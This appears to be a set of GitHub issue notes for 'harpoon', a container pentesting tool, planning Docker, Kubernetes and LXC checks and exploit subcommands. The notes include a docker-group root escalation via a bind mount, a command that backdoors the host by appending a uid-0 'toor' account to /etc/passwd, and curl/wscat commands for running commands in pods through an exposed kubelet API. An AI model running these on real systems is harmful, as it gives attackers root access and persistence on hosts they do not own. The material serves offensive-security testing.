professionallyevil / harpoon Goto Github PK

If it turns out that you are a part of the docker group, escalate to root with the following:

docker run -it --rm -v $PWD:/mnt bash

We can also backdoor the machine after this with;

echo 'toor:$1$.PWORDHASH:0:0:root:/root:/bin/sh' >> /mnt/etc/passwd

Just another reason why Docker bind mounts can be dangerous >:)

Add a subcommand that will attempt to deploy a pod. It should offer the following options:

• -deploy
  • if ran without other flags default values will be used
• -img
• -cmd [cmd array]
• -bind [path]
• -name

harpoon kube-exec -h https://<node-ip | node-domain> [-p 10250] [-e command]

If -e is given then if the preliminary checks pass, harpoon will try to exploit the mis-configuration. This attack only works if you can route to the node api. So, you either have to be on the same network, or it happens to be publicly routable.

Check (verify/come up with a better check)

[[ '${curl --insecure "https://<node>:10250/pods" 2>1 | head -c 2}' != '{"' ]] && echo Match

Execute command

curl --insecure -v -H "Upgrade: WebSocket" -H "Connection: Upgrade" -H "X-Stream-Protocol-Version: v2.channel.k8s.io" -H "X-Stream-Protocol-Version: channel.k8s.io" -X POST "https://<node>:10250/exec/default/redis-master-57fc67768d-klfw6/master?command=echo&command=hi&input=1&output=1&tty=1"

Stream results

wscat -c "https://<node>:10250/exec/default/redis-master-57fc67768d-klfw6/master?command=echo&command=hi&input=1&output=1&tty=1" --no-check

These are actually pretty similar to the docker checks

Can check for lxd socket. Is it mounted in a lxd container?
/var/lib/lxd/unix.socket

Can we check proc cgroups?

For example:

-oA <basename>    output in all formats
-oG               output in grepable format
-oN               output in normal format        

https://github.com/genuinetools/amicontained

Give the fingerprint command the following interface.

harpoon fingerprint -[adklD]
    -a        run all checks (default)
    -d        run only docker checks
    -k        run only kubernetes checks
    -l        run only lxc checks
    -D        attempt to discover container tech in place

Many of the commands expect the -sock and -cid flags. However as I start generalizing the tool to work on other container setups, this might not be as viable. It's possible that I either break them out into separate tools. One for Docker, one for LXC, one for Kubernetes, etc... Or I implement several modules into the program, and allow them to be loaded and unloaded via command line args.